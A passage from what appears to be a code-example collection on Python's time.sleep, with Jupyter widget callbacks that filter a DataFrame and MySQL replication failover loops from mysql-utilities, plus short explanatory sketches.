					global filtereddata
					global field
					global geotype
					global filename
					global filtereddict
					global initialdata
					global fieldlist
					

					# getting header values
					header = initialdata.columns.values.tolist()

					# slicing the df by min/max
					new = initialdata[(initialdata[field]>=min)&(initialdata[field]<=max)]
					'''
					if len(new) == 0:
						make_dummy(header,geo_feature_type)
					else:
						make_type(new,filename,geo_feature_type)
					'''
					make_dummy(header,geo_feature_type)



					lastupdate = {'value':True}

					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)

					time.sleep(.5)

					# updating json object that will be hashed
					lastupdate = {'value':False}


					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)
					
					filtereddata = new

					if len(filtereddict) == 0:
						filtereddict = {field:filtereddata}
					else:
						filtereddict[field] = filtereddata

					#if dictlistglobal[-1]['field'] == field and len(widgetslist) == len(dictlistglobal) and oldrange == 0:
					if len(widgetslist) == len(dictlistglobal):
						count = 0
						oldrow = fieldlist[0]
						# code to update slices here
						for row in fieldlist[:]:
							count += 1
							if not dictlistglobal[count-1]['type'] == 'Dropdown':
								minval,maxval = filtereddata[row].min(),filtereddata[row].max() 
								testval = tabs.children[count-1].children[0].children[1].value - tabs.children[count-1].children[0].children[0].value
								print (maxval - minval),testval
								if (maxval - minval) < testval:
									tabs.children[count-1].children[0].children[0].value = minval
									tabs.children[count-1].children[0].children[1].value = maxval
						make_type(new,filename,geo_feature_type)
	




				# getting slider 1 and slider2
				slider1,slider2 = row['widget']
				
				# instantiating widget with the desired range slices/function mapping
				on_value_change_first(initialdata[field].min(),initialdata[field].max())

				newwidget = widgets.interactive(on_value_change_first,min=slider1,max=slider2)
				newwidget = widgets.Box(children=[newwidget])
				widgetslist.append(newwidget)
			else:
				field = row['field']
				global tabs
				global oldrange
				oldrange = 0

				# function that takes to min and max
				# then slices df appropriately
				def on_value_change(min,max):
					global filtereddata
					global field
					global geotype
					global filename
					global filtereddict
					global fieldlist
					global tabs
					global oldrange

					field = fieldlist[-1]

					if not dictlistglobal[-1]['field'] == field:
						oldrange = 0


					if fieldlist[0] == field:
						filtereddata = filtereddict[field]
					else:
						#raw_input('xxx')
						filtereddata = get_df(field,fieldlist,filtereddict)
					


					# getting header value
					header = filtereddata.columns.values.tolist()

					# slicing the df by min/max
					new = filtereddata[(filtereddata[field]>=min)&(filtereddata[field]<=max)]
					
					'''
					if len(new) == 0:
						make_dummy(header,geo_feature_type)
					else:
						make_type(new,filename,geo_feature_type)
					'''
					make_dummy(header,geo_feature_type)


					lastupdate = {'value':True}

					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)

					time.sleep(.5)

					# updating json object that will be hashed
					lastupdate = {'value':False}


					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)
					
					filtereddata = new

					filtereddict[field] = filtereddata

					#if not dictlistglobal[-1]['field'] == field:
					#	oldrange = 0


					#if dictlistglobal[-1]['field'] == field and len(widgetslist) == len(dictlistglobal) and oldrange == 0:
					if len(widgetslist) == len(dictlistglobal):
						count = 0
						oldrow = fieldlist[0]
						# code to update slices here
						for row in fieldlist[:]:
							count += 1
							if not dictlistglobal[count-1]['type'] == 'Dropdown':
								minval,maxval = filtereddata[row].min(),filtereddata[row].max() 
								testval = tabs.children[count-1].children[0].children[1].value - tabs.children[count-1].children[0].children[0].value
								print (maxval - minval),testval
								if (maxval - minval) < testval:
									tabs.children[count-1].children[0].children[0].value = minval
									tabs.children[count-1].children[0].children[1].value = maxval
						make_type(new,filename,geo_feature_type)



				# getting slider 1 and slider2
				slider1,slider2 = row['widget']

				# instantiating widget with the desired range slices/function mapping
				on_value_change(initialdata[field].min(),initialdata[field].max())
				newwidget = widgets.interactive(on_value_change,min=slider1,max=slider2)
				newwidget = widgets.Box(children=[newwidget])
				widgetslist.append(newwidget)

		elif widget_type == 'Dropdown':
			global fieldcategory
			global filtereddata
			global geotype
			global filename
			global filtereddict
			global fieldlist
			fieldcategory = row['field']
			uniques = ['ALL'] + np.unique(data[fieldcategory]).tolist()


			# function that slices by category input by 
			# dropdown box within widget
			def slice_by_category(on_dropdown):
				global filtereddata
				global fieldcategory
				global geo_feature_type
				global filename
				global filtereddict
				global fieldlist

				filtereddata = get_df(fieldcategory,fieldlist,filtereddict)
				# getting header
				header = filtereddata.columns.values.tolist()

				# slicing category by appropriate field
				if not on_dropdown == 'ALL':
					new = filtereddata[filtereddata[fieldcategory]==on_dropdown]
				elif on_dropdown == 'ALL':
					new = filtereddata
				
				# updating json object that will be hashed
				lastupdate = {'value':True}


				# checking to see if data actually has values
				if len(new) == 0:
					make_dummy(header,geotype)
				else:
					make_type(new,filename,geotype)


				with open('data.json','wb') as jsonfile:
					json.dump(lastupdate,jsonfile)

				time.sleep(.5)

				# updating json object that will be hashed
				lastupdate = {'value':False}


				with open('data.json','wb') as jsonfile:
					json.dump(lastupdate,jsonfile)

				filtereddata = new

				filtereddict[fieldcategory] = filtereddata  

				print np.unique(new[fieldcategory])
			# getting drop down feature from current row in dictlist
			dropdownwidget = row['widget']

			# instantiating widget for dropdown categorical values in a field
			slice_by_category('ALL')
			dropdownwidget.observe(slice_by_category, names='on_dropdown')
			newwidget = widgets.interactive(slice_by_category,on_dropdown=uniques)
			newwidget = widgets.Box(children = [newwidget])
			widgetslist.append(newwidget)
		print count
		count += 1
	
	tabs = widgets.Tab(children=widgetslist)
	count = 0
	for row in fieldlist:
		tabs.set_title(count,row)
		count += 1
	display(tabs)
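
Example 41 shows the writer side of that handshake again; the consumer is not shown in any of these listings. Assuming it simply re-reads data.json on a timer, a hypothetical polling loop could look like the following, again paced with time.sleep (a polling interval shorter than the writer's 0.5-second hold makes it likely the pulse is seen):

import json
import time

def poll_for_updates(path='data.json', interval=0.25):
    # Hypothetical consumer for the flag written by the callbacks above.
    last = False
    while True:
        try:
            with open(path) as jsonfile:
                current = json.load(jsonfile).get('value', False)
        except (IOError, ValueError):
            current = last  # file missing or mid-write; keep the previous state
        if current and not last:
            print('update detected; refresh the rendered output here')
        last = current
        time.sleep(interval)  # pace the polling loop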

Example 43

Project: mysql-utilities
Source File: failover_daemon.py
View license
    def run(self):
        """Run automatic failover.

        This method implements the automatic failover facility. It uses the existing
        failover() method of the RplCommands class to conduct failover.

        When the master goes down, the method can perform one of three actions:

        1) failover to list of candidates first then slaves
        2) failover to list of candidates only
        3) fail

        rpl[in]        instance of the RplCommands class
        interval[in]   time in seconds to wait to check status of servers

        Returns bool - True = success, raises exception on error
        """
        failover_mode = self.mode
        pingtime = self.options.get("pingtime", 3)
        exec_fail = self.options.get("exec_fail", None)
        post_fail = self.options.get("post_fail", None)
        pedantic = self.options.get("pedantic", False)

        # Only works for GTID_MODE=ON
        if not self.rpl.topology.gtid_enabled():
            msg = ("Topology must support global transaction ids and have "
                   "GTID_MODE=ON.")
            self._report(msg, logging.CRITICAL)
            raise UtilRplError(msg)

        # Require --master-info-repository=TABLE for all slaves
        if not self.rpl.topology.check_master_info_type("TABLE"):
            msg = ("Failover requires --master-info-repository=TABLE for "
                   "all slaves.")
            self._report(msg, logging.ERROR, False)
            raise UtilRplError(msg)

        # Check for mixing IP and hostnames
        if not self.rpl.check_host_references():
            print("# WARNING: {0}".format(HOST_IP_WARNING))
            self._report(HOST_IP_WARNING, logging.WARN, False)
            print("#\n# Failover daemon will start in 10 seconds.")
            time.sleep(10)

        # Test failover script. If it doesn't exist, fail.
        no_exec_fail_msg = ("Failover check script cannot be found. Please "
                            "check the path and filename for accuracy and "
                            "restart the failover daemon.")
        if exec_fail is not None and not os.path.exists(exec_fail):
            self._report(no_exec_fail_msg, logging.CRITICAL, False)
            raise UtilRplError(no_exec_fail_msg)

        # Check existence of errant transactions on slaves
        errant_tnx = self.rpl.topology.find_errant_transactions()
        if errant_tnx:
            print("# WARNING: {0}".format(_ERRANT_TNX_ERROR))
            self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
            for host, port, tnx_set in errant_tnx:
                errant_msg = (" - For slave '{0}@{1}': "
                              "{2}".format(host, port, ", ".join(tnx_set)))
                print("# {0}".format(errant_msg))
                self._report(errant_msg, logging.WARN, False)
            # Raise an exception (to stop) if pedantic mode is ON
            if pedantic:
                msg = ("{0} Note: If you want to ignore this issue, please do "
                       "not use the --pedantic option."
                       "".format(_ERRANT_TNX_ERROR))
                self._report(msg, logging.CRITICAL)
                raise UtilRplError(msg)

        self._report("Failover daemon started.", logging.INFO, False)
        self._report("Failover mode = {0}.".format(failover_mode),
                     logging.INFO, False)

        # Main loop - loop and fire on interval.
        done = False
        first_pass = True
        failover = False

        while not done:
            # Use try block in case master class has gone away.
            try:
                old_host = self.rpl.master.host
                old_port = self.rpl.master.port
            except:
                old_host = "UNKNOWN"
                old_port = "UNKNOWN"

            # If a failover script is provided, check it else check master
            # using connectivity checks.
            if exec_fail is not None:
                # Execute failover check script
                if not os.path.exists(exec_fail):
                    self._report(no_exec_fail_msg, logging.CRITICAL, False)
                    raise UtilRplError(no_exec_fail_msg)
                else:
                    self._report("# Spawning external script for failover "
                                 "checking.")
                    res = execute_script(exec_fail, None,
                                         [old_host, old_port],
                                         self.rpl.verbose)
                    if res == 0:
                        self._report("# Failover check script completed "
                                     "Ok. Failover averted.")
                    else:
                        self._report("# Failover check script failed. "
                                     "Failover initiated", logging.WARN)
                        failover = True
            else:
                # Check the master. If not alive, wait for pingtime seconds
                # and try again.
                if self.rpl.topology.master is not None and \
                   not self.rpl.topology.master.is_alive():
                    msg = ("Master may be down. Waiting for {0} seconds."
                           "".format(pingtime))
                    self._report(msg, logging.INFO, False)
                    time.sleep(pingtime)
                    try:
                        self.rpl.topology.master.connect()
                    except:
                        pass

                # Check the master again. If no connection or lost connection,
                # try ping. This performs the timeout threshold for detecting
                # a down master. If still not alive, try to reconnect and if
                # connection fails after 3 attempts, failover.
                if self.rpl.topology.master is None or \
                   not ping_host(self.rpl.topology.master.host, pingtime) or \
                   not self.rpl.topology.master.is_alive():
                    failover = True
                    if self._reconnect_master(self.pingtime):
                        failover = False  # Master is now connected again
                    if failover:
                        self._report("Failed to reconnect to the master after "
                                     "3 attemps.", logging.INFO)

            if failover:
                self._report("Master is confirmed to be down or "
                             "unreachable.", logging.CRITICAL, False)
                try:
                    self.rpl.topology.master.disconnect()
                except:
                    pass

                if failover_mode == "auto":
                    self._report("Failover starting in 'auto' mode...")
                    res = self.rpl.topology.failover(self.rpl.candidates,
                                                     False)
                elif failover_mode == "elect":
                    self._report("Failover starting in 'elect' mode...")
                    res = self.rpl.topology.failover(self.rpl.candidates, True)
                else:
                    msg = _FAILOVER_ERROR.format("Master has failed and "
                                                 "automatic failover is "
                                                 "not enabled. ")
                    self._report(msg, logging.CRITICAL, False)
                    # Execute post failover script
                    self.rpl.topology.run_script(post_fail, False,
                                                 [old_host, old_port])
                    raise UtilRplError(msg, _FAILOVER_ERRNO)
                if not res:
                    msg = _FAILOVER_ERROR.format("An error was encountered "
                                                 "during failover. ")
                    self._report(msg, logging.CRITICAL, False)
                    # Execute post failover script
                    self.rpl.topology.run_script(post_fail, False,
                                                 [old_host, old_port])
                    raise UtilRplError(msg)
                self.rpl.master = self.rpl.topology.master
                self.master = self.rpl.master
                self.rpl.topology.remove_discovered_slaves()
                self.rpl.topology.discover_slaves()
                self.list_data = None
                print("\nFailover daemon will restart in 5 seconds.")
                time.sleep(5)
                failover = False
                # Execute post failover script
                self.rpl.topology.run_script(post_fail, False,
                                             [old_host, old_port,
                                              self.rpl.master.host,
                                              self.rpl.master.port])

                # Unregister existing instances from slaves
                self._report("Unregistering existing instances from slaves.",
                             logging.INFO, False)
                self.unregister_slaves(self.rpl.topology)

                # Register instance on the new master
                msg = ("Registering instance on new master "
                       "{0}:{1}.").format(self.master.host, self.master.port)
                self._report(msg, logging.INFO, False)

                failover_mode = self.register_instance()

            # discover slaves if option was specified at startup
            elif (self.options.get("discover", None) is not None
                  and not first_pass):
                # Force refresh of health list if new slaves found
                if self.rpl.topology.discover_slaves():
                    self.list_data = None

            # Check existence of errant transactions on slaves
            errant_tnx = self.rpl.topology.find_errant_transactions()
            if errant_tnx:
                if pedantic:
                    print("# WARNING: {0}".format(_ERRANT_TNX_ERROR))
                    self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
                    for host, port, tnx_set in errant_tnx:
                        errant_msg = (" - For slave '{0}@{1}': "
                                      "{2}".format(host, port,
                                                   ", ".join(tnx_set)))
                        print("# {0}".format(errant_msg))
                        self._report(errant_msg, logging.WARN, False)

                    # Raise an exception (to stop) if pedantic mode is ON
                    raise UtilRplError("{0} Note: If you want to ignore this "
                                       "issue, please do not use the "
                                       "--pedantic "
                                       "option.".format(_ERRANT_TNX_ERROR))
                else:
                    if self.rpl.logging:
                        warn_msg = ("{0} Check log for more "
                                    "details.".format(_ERRANT_TNX_ERROR))
                    else:
                        warn_msg = _ERRANT_TNX_ERROR
                    self.add_warning("errant_tnx", warn_msg)
                    self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
                    for host, port, tnx_set in errant_tnx:
                        errant_msg = (" - For slave '{0}@{1}': "
                                      "{2}".format(host, port,
                                                   ", ".join(tnx_set)))
                        self._report(errant_msg, logging.WARN, False)
            else:
                self.del_warning("errant_tnx")

            if self.master and self.master.is_alive():
                # Log status
                self._print_warnings()
                self._log_master_status()

                self.list_data = []
                if "health" in self.report_values:
                    (health_labels, health_data) = self._format_health_data()
                    if health_data:
                        self._log_data("Health Status:", health_labels,
                                       health_data)
                if "gtid" in self.report_values:
                    (gtid_labels, gtid_data) = self._format_gtid_data()
                    for i, v in enumerate(gtid_data):
                        if v:
                            self._log_data("GTID Status - {0}"
                                           "".format(_GTID_LISTS[i]),
                                           gtid_labels, v)
                if "uuid" in self.report_values:
                    (uuid_labels, uuid_data) = self._format_uuid_data()
                    if uuid_data:
                        self._log_data("UUID Status:", uuid_labels, uuid_data)

            # Disconnect the master while waiting for the interval to expire
            self.master.disconnect()

            # Wait for the interval to expire
            time.sleep(self.interval)

            # Reconnect to the master
            self._reconnect_master(self.pingtime)

            first_pass = False

        return True
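
In this daemon, time.sleep plays several roles: a fixed 10-second pause after the host/IP warning, a pingtime wait before re-checking a silent master, a 5-second pause before the daemon restarts after a completed failover, and the per-pass interval at the bottom of the main loop. The reconnection itself is delegated to self._reconnect_master(), whose body is not shown here; a plausible sketch of such a helper, based only on the reported behaviour of three attempts with a pingtime pause between them:

import time

def reconnect_with_retries(server, pingtime=3, attempts=3):
    # Hypothetical stand-in for _reconnect_master(): returns True once the
    # server accepts a connection, False after the given number of failed attempts.
    for attempt in range(attempts):
        try:
            server.connect()
            return True
        except Exception:
            if attempt < attempts - 1:
                time.sleep(pingtime)  # wait before the next attempt
    return False  # the caller treats this as confirmation that failover is needed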

Example 44

Project: mysql-utilities
Source File: rpl_admin.py
View license
    def run_auto_failover(self, console, failover_mode="auto"):
        """Run automatic failover

        This method implements the automatic failover facility. It uses the
        FailoverConsole class from the failover_console.py to implement all
        user interface commands and uses the existing failover() method of
        this class to conduct failover.

        When the master goes down, the method can perform one of three actions:

        1) failover to list of candidates first then slaves
        2) failover to list of candidates only
        3) fail

        console[in]    instance of the failover console class.

        Returns bool - True = success, raises exception on error
        """
        pingtime = self.options.get("pingtime", 3)
        exec_fail = self.options.get("exec_fail", None)
        post_fail = self.options.get("post_fail", None)
        pedantic = self.options.get('pedantic', False)
        fail_retry = self.options.get('fail_retry', None)

        # Only works for GTID_MODE=ON
        if not self.topology.gtid_enabled():
            msg = "Topology must support global transaction ids " + \
                  "and have GTID_MODE=ON."
            self._report(msg, logging.CRITICAL)
            raise UtilRplError(msg)

        # Require --master-info-repository=TABLE for all slaves
        if not self.topology.check_master_info_type("TABLE"):
            msg = "Failover requires --master-info-repository=TABLE for " + \
                  "all slaves."
            self._report(msg, logging.ERROR, False)
            raise UtilRplError(msg)

        # Check for mixing IP and hostnames
        if not self._check_host_references():
            print("# WARNING: {0}".format(HOST_IP_WARNING))
            self._report(HOST_IP_WARNING, logging.WARN, False)
            print("#\n# Failover console will start in {0} seconds.".format(
                WARNING_SLEEP_TIME))
            time.sleep(WARNING_SLEEP_TIME)

        # Check existence of errant transactions on slaves
        errant_tnx = self.topology.find_errant_transactions()
        if errant_tnx:
            print("# WARNING: {0}".format(_ERRANT_TNX_ERROR))
            self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
            for host, port, tnx_set in errant_tnx:
                errant_msg = (" - For slave '{0}@{1}': "
                              "{2}".format(host, port, ", ".join(tnx_set)))
                print("# {0}".format(errant_msg))
                self._report(errant_msg, logging.WARN, False)
            # Raise an exception (to stop) if pedantic mode is ON
            if pedantic:
                raise UtilRplError("{0} Note: If you want to ignore this "
                                   "issue, please do not use the --pedantic "
                                   "option.".format(_ERRANT_TNX_ERROR))

        self._report("Failover console started.", logging.INFO, False)
        self._report("Failover mode = %s." % failover_mode, logging.INFO,
                     False)

        # Main loop - loop and fire on interval.
        done = False
        first_pass = True
        failover = False
        while not done:
            # Use try block in case master class has gone away.
            try:
                old_host = self.master.host
                old_port = self.master.port
            except:
                old_host = "UNKNOWN"
                old_port = "UNKNOWN"

            # If a failover script is provided, check it else check master
            # using connectivity checks.
            if exec_fail is not None:
                # Execute failover check script
                if not os.path.isfile(exec_fail):
                    message = EXTERNAL_SCRIPT_DOES_NOT_EXIST.format(
                        path=exec_fail)
                    self._report(message, logging.CRITICAL, False)
                    raise UtilRplError(message)
                elif not os.access(exec_fail, os.X_OK):
                    message = INSUFFICIENT_FILE_PERMISSIONS.format(
                        path=exec_fail, permissions='execute')
                    self._report(message, logging.CRITICAL, False)
                    raise UtilRplError(message)
                else:
                    self._report("# Spawning external script for failover "
                                 "checking.")
                    res = execute_script(exec_fail, None,
                                         [old_host, old_port], self.verbose)
                    if res == 0:
                        self._report("# Failover check script completed Ok. "
                                     "Failover averted.")
                    else:
                        self._report("# Failover check script failed. "
                                     "Failover initiated", logging.WARN)
                        failover = True
            else:
                # Check the master. If not alive, wait for pingtime seconds
                # and try again.
                if self.topology.master is not None and \
                   not self.topology.master.is_alive():
                    msg = "Master may be down. Waiting for %s seconds." % \
                          pingtime
                    self._report(msg, logging.INFO, False)
                    time.sleep(pingtime)
                    try:
                        self.topology.master.connect()
                    except:
                        pass

                # If user specified a master fail retry, wait for the
                # predetermined time and attempt to check the master again.
                if fail_retry is not None and \
                   not self.topology.master.is_alive():
                    msg = "Master is still not reachable. Waiting for %s " \
                          "seconds to retry detection." % fail_retry
                    self._report(msg, logging.INFO, False)
                    time.sleep(fail_retry)
                    try:
                        self.topology.master.connect()
                    except:
                        pass

                # Check the master again. If no connection or lost connection,
                # try ping. This performs the timeout threshold for detecting
                # a down master. If still not alive, try to reconnect and if
                # connection fails after 3 attempts, failover.
                if self.topology.master is None or \
                   not ping_host(self.topology.master.host, pingtime) or \
                   not self.topology.master.is_alive():
                    failover = True
                    i = 0
                    while i < 3:
                        try:
                            self.topology.master.connect()
                            failover = False  # Master is now connected again
                            break
                        except:
                            pass
                        time.sleep(pingtime)
                        i += 1

                    if failover:
                        self._report("Failed to reconnect to the master after "
                                     "3 attemps.", logging.INFO)
                    else:
                        self._report("Master is Ok. Resuming watch.",
                                     logging.INFO)

            if failover:
                self._report("Master is confirmed to be down or unreachable.",
                             logging.CRITICAL, False)
                try:
                    self.topology.master.disconnect()
                except:
                    pass
                console.clear()
                if failover_mode == 'auto':
                    self._report("Failover starting in 'auto' mode...")
                    res = self.topology.failover(self.candidates, False)
                elif failover_mode == 'elect':
                    self._report("Failover starting in 'elect' mode...")
                    res = self.topology.failover(self.candidates, True)
                else:
                    msg = _FAILOVER_ERROR % ("Master has failed and automatic "
                                             "failover is not enabled. ")
                    self._report(msg, logging.CRITICAL, False)
                    # Execute post failover script
                    self.topology.run_script(post_fail, False,
                                             [old_host, old_port])
                    raise UtilRplError(msg, _FAILOVER_ERRNO)
                if not res:
                    msg = _FAILOVER_ERROR % ("An error was encountered "
                                             "during failover. ")
                    self._report(msg, logging.CRITICAL, False)
                    # Execute post failover script
                    self.topology.run_script(post_fail, False,
                                             [old_host, old_port])
                    raise UtilRplError(msg)
                self.master = self.topology.master
                console.master = self.master
                self.topology.remove_discovered_slaves()
                self.topology.discover_slaves()
                console.list_data = None
                print "\nFailover console will restart in 5 seconds."
                time.sleep(5)
                console.clear()
                failover = False
                # Execute post failover script
                self.topology.run_script(post_fail, False,
                                         [old_host, old_port,
                                          self.master.host, self.master.port])

                # Unregister existing instances from slaves
                self._report("Unregistering existing instances from slaves.",
                             logging.INFO, False)
                console.unregister_slaves(self.topology)

                # Register instance on the new master
                self._report("Registering instance on master.", logging.INFO,
                             False)
                failover_mode = console.register_instance()

            # discover slaves if option was specified at startup
            elif (self.options.get("discover", None) is not None
                  and not first_pass):
                # Force refresh of health list if new slaves found
                if self.topology.discover_slaves():
                    console.list_data = None

            # Check existence of errant transactions on slaves
            errant_tnx = self.topology.find_errant_transactions()
            if errant_tnx:
                if pedantic:
                    print("# WARNING: {0}".format(_ERRANT_TNX_ERROR))
                    self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
                    for host, port, tnx_set in errant_tnx:
                        errant_msg = (" - For slave '{0}@{1}': "
                                      "{2}".format(host, port,
                                                   ", ".join(tnx_set)))
                        print("# {0}".format(errant_msg))
                        self._report(errant_msg, logging.WARN, False)

                    # Raise an exception (to stop) if pedantic mode is ON
                    raise UtilRplError("{0} Note: If you want to ignore this "
                                       "issue, please do not use the "
                                       "--pedantic "
                                       "option.".format(_ERRANT_TNX_ERROR))
                else:
                    if self.logging:
                        warn_msg = ("{0} Check log for more "
                                    "details.".format(_ERRANT_TNX_ERROR))
                    else:
                        warn_msg = _ERRANT_TNX_ERROR
                    console.add_warning('errant_tnx', warn_msg)
                    self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
                    for host, port, tnx_set in errant_tnx:
                        errant_msg = (" - For slave '{0}@{1}': "
                                      "{2}".format(host, port,
                                                   ", ".join(tnx_set)))
                        self._report(errant_msg, logging.WARN, False)
            else:
                console.del_warning('errant_tnx')

            res = console.display_console()
            if res is not None:    # None = normal timeout, keep going
                if not res:
                    return False   # Errors detected
                done = True        # User has quit
            first_pass = False

        return True
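
This console variant handles the end-of-pass wait inside console.display_console() (the comment on its return value suggests it blocks until a normal timeout), whereas the daemon in the previous example ends each pass with an explicit disconnect, time.sleep(self.interval), reconnect sequence. Stripped of the failover machinery, that daemon-style skeleton looks roughly like the sketch below; connect, disconnect and the idea of an interval come from the examples, while check() and the 15-second default are placeholders:

import time

def monitor_loop(master, check, interval=15):
    # Interval-driven watch loop in the style of the failover daemon above.
    while True:
        if check(master):         # one monitoring pass; truthy result means stop
            return
        master.disconnect()       # release the connection while idle
        time.sleep(interval)      # wait for the interval to expire
        master.connect()          # reconnect before the next pass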

Example 46

Project: mysql-utilities
Source File: rpl_admin.py
View license
    def run_auto_failover(self, console, failover_mode="auto"):
        """Run automatic failover

        This method implements the automatic failover facility. It uses the
        FailoverConsole class from the failover_console.py to implement all
        user interface commands and uses the existing failover() method of
        this class to conduct failover.

        When the master goes down, the method can perform one of three actions:

        1) failover to list of candidates first then slaves
        2) failover to list of candidates only
        3) fail

        console[in]    instance of the failover console class.

        Returns bool - True = success, raises exception on error
        """
        pingtime = self.options.get("pingtime", 3)
        exec_fail = self.options.get("exec_fail", None)
        post_fail = self.options.get("post_fail", None)
        pedantic = self.options.get('pedantic', False)
        fail_retry = self.options.get('fail_retry', None)

        # Only works for GTID_MODE=ON
        if not self.topology.gtid_enabled():
            msg = "Topology must support global transaction ids " + \
                  "and have GTID_MODE=ON."
            self._report(msg, logging.CRITICAL)
            raise UtilRplError(msg)

        # Require --master-info-repository=TABLE for all slaves
        if not self.topology.check_master_info_type("TABLE"):
            msg = "Failover requires --master-info-repository=TABLE for " + \
                  "all slaves."
            self._report(msg, logging.ERROR, False)
            raise UtilRplError(msg)

        # Check for mixing IP and hostnames
        if not self._check_host_references():
            print("# WARNING: {0}".format(HOST_IP_WARNING))
            self._report(HOST_IP_WARNING, logging.WARN, False)
            print("#\n# Failover console will start in {0} seconds.".format(
                WARNING_SLEEP_TIME))
            time.sleep(WARNING_SLEEP_TIME)

        # Check existence of errant transactions on slaves
        errant_tnx = self.topology.find_errant_transactions()
        if errant_tnx:
            print("# WARNING: {0}".format(_ERRANT_TNX_ERROR))
            self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
            for host, port, tnx_set in errant_tnx:
                errant_msg = (" - For slave '{0}@{1}': "
                              "{2}".format(host, port, ", ".join(tnx_set)))
                print("# {0}".format(errant_msg))
                self._report(errant_msg, logging.WARN, False)
            # Raise an exception (to stop) if pedantic mode is ON
            if pedantic:
                raise UtilRplError("{0} Note: If you want to ignore this "
                                   "issue, please do not use the --pedantic "
                                   "option.".format(_ERRANT_TNX_ERROR))

        self._report("Failover console started.", logging.INFO, False)
        self._report("Failover mode = %s." % failover_mode, logging.INFO,
                     False)

        # Main loop - loop and fire on interval.
        done = False
        first_pass = True
        failover = False
        while not done:
            # Use try block in case master class has gone away.
            try:
                old_host = self.master.host
                old_port = self.master.port
            except:
                old_host = "UNKNOWN"
                old_port = "UNKNOWN"

            # If a failover script is provided, run it; otherwise check the
            # master using connectivity checks.
            if exec_fail is not None:
                # Execute failover check script
                if not os.path.isfile(exec_fail):
                    message = EXTERNAL_SCRIPT_DOES_NOT_EXIST.format(
                        path=exec_fail)
                    self._report(message, logging.CRITICAL, False)
                    raise UtilRplError(message)
                elif not os.access(exec_fail, os.X_OK):
                    message = INSUFFICIENT_FILE_PERMISSIONS.format(
                        path=exec_fail, permissions='execute')
                    self._report(message, logging.CRITICAL, False)
                    raise UtilRplError(message)
                else:
                    self._report("# Spawning external script for failover "
                                 "checking.")
                    res = execute_script(exec_fail, None,
                                         [old_host, old_port], self.verbose)
                    if res == 0:
                        self._report("# Failover check script completed Ok. "
                                     "Failover averted.")
                    else:
                        self._report("# Failover check script failed. "
                                     "Failover initiated", logging.WARN)
                        failover = True
            else:
                # Check the master. If not alive, wait for pingtime seconds
                # and try again.
                if self.topology.master is not None and \
                   not self.topology.master.is_alive():
                    msg = "Master may be down. Waiting for %s seconds." % \
                          pingtime
                    self._report(msg, logging.INFO, False)
                    time.sleep(pingtime)
                    try:
                        self.topology.master.connect()
                    except:
                        pass

                # If user specified a master fail retry, wait for the
                # predetermined time and attempt to check the master again.
                if fail_retry is not None and \
                   not self.topology.master.is_alive():
                    msg = "Master is still not reachable. Waiting for %s " \
                          "seconds to retry detection." % fail_retry
                    self._report(msg, logging.INFO, False)
                    time.sleep(fail_retry)
                    try:
                        self.topology.master.connect()
                    except:
                        pass

                # Check the master again. If no connection or lost connection,
                # try ping. This performs the timeout threshold for detecting
                # a down master. If still not alive, try to reconnect and if
                # connection fails after 3 attempts, failover.
                if self.topology.master is None or \
                   not ping_host(self.topology.master.host, pingtime) or \
                   not self.topology.master.is_alive():
                    failover = True
                    i = 0
                    while i < 3:
                        try:
                            self.topology.master.connect()
                            failover = False  # Master is now connected again
                            break
                        except:
                            pass
                        time.sleep(pingtime)
                        i += 1

                    if failover:
                        self._report("Failed to reconnect to the master after "
                                     "3 attemps.", logging.INFO)
                    else:
                        self._report("Master is Ok. Resuming watch.",
                                     logging.INFO)

            if failover:
                self._report("Master is confirmed to be down or unreachable.",
                             logging.CRITICAL, False)
                try:
                    self.topology.master.disconnect()
                except:
                    pass
                console.clear()
                if failover_mode == 'auto':
                    self._report("Failover starting in 'auto' mode...")
                    res = self.topology.failover(self.candidates, False)
                elif failover_mode == 'elect':
                    self._report("Failover starting in 'elect' mode...")
                    res = self.topology.failover(self.candidates, True)
                else:
                    msg = _FAILOVER_ERROR % ("Master has failed and automatic "
                                             "failover is not enabled. ")
                    self._report(msg, logging.CRITICAL, False)
                    # Execute post failover script
                    self.topology.run_script(post_fail, False,
                                             [old_host, old_port])
                    raise UtilRplError(msg, _FAILOVER_ERRNO)
                if not res:
                    msg = _FAILOVER_ERROR % ("An error was encountered "
                                             "during failover. ")
                    self._report(msg, logging.CRITICAL, False)
                    # Execute post failover script
                    self.topology.run_script(post_fail, False,
                                             [old_host, old_port])
                    raise UtilRplError(msg)
                self.master = self.topology.master
                console.master = self.master
                self.topology.remove_discovered_slaves()
                self.topology.discover_slaves()
                console.list_data = None
                print "\nFailover console will restart in 5 seconds."
                time.sleep(5)
                console.clear()
                failover = False
                # Execute post failover script
                self.topology.run_script(post_fail, False,
                                         [old_host, old_port,
                                          self.master.host, self.master.port])

                # Unregister existing instances from slaves
                self._report("Unregistering existing instances from slaves.",
                             logging.INFO, False)
                console.unregister_slaves(self.topology)

                # Register instance on the new master
                self._report("Registering instance on master.", logging.INFO,
                             False)
                failover_mode = console.register_instance()

            # discover slaves if option was specified at startup
            elif (self.options.get("discover", None) is not None
                  and not first_pass):
                # Force refresh of health list if new slaves found
                if self.topology.discover_slaves():
                    console.list_data = None

            # Check existence of errant transactions on slaves
            errant_tnx = self.topology.find_errant_transactions()
            if errant_tnx:
                if pedantic:
                    print("# WARNING: {0}".format(_ERRANT_TNX_ERROR))
                    self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
                    for host, port, tnx_set in errant_tnx:
                        errant_msg = (" - For slave '{0}@{1}': "
                                      "{2}".format(host, port,
                                                   ", ".join(tnx_set)))
                        print("# {0}".format(errant_msg))
                        self._report(errant_msg, logging.WARN, False)

                    # Raise an exception (to stop) if pedantic mode is ON
                    raise UtilRplError("{0} Note: If you want to ignore this "
                                       "issue, please do not use the "
                                       "--pedantic "
                                       "option.".format(_ERRANT_TNX_ERROR))
                else:
                    if self.logging:
                        warn_msg = ("{0} Check log for more "
                                    "details.".format(_ERRANT_TNX_ERROR))
                    else:
